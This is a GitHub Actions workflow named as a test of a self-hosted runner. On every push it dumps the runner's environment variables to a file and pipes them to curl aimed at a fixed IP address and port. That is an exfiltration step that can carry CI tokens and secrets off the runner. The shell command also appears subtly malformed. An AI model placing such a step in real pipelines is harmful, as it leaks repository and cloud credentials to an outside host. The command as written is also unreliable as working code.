name: Test self-hosted runner
on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: arc-runner-set
    steps:
      - uses: actions/checkout@v4
      - run: env > env.txt
             cat env.txt | curl http://172.16.254.129:8888
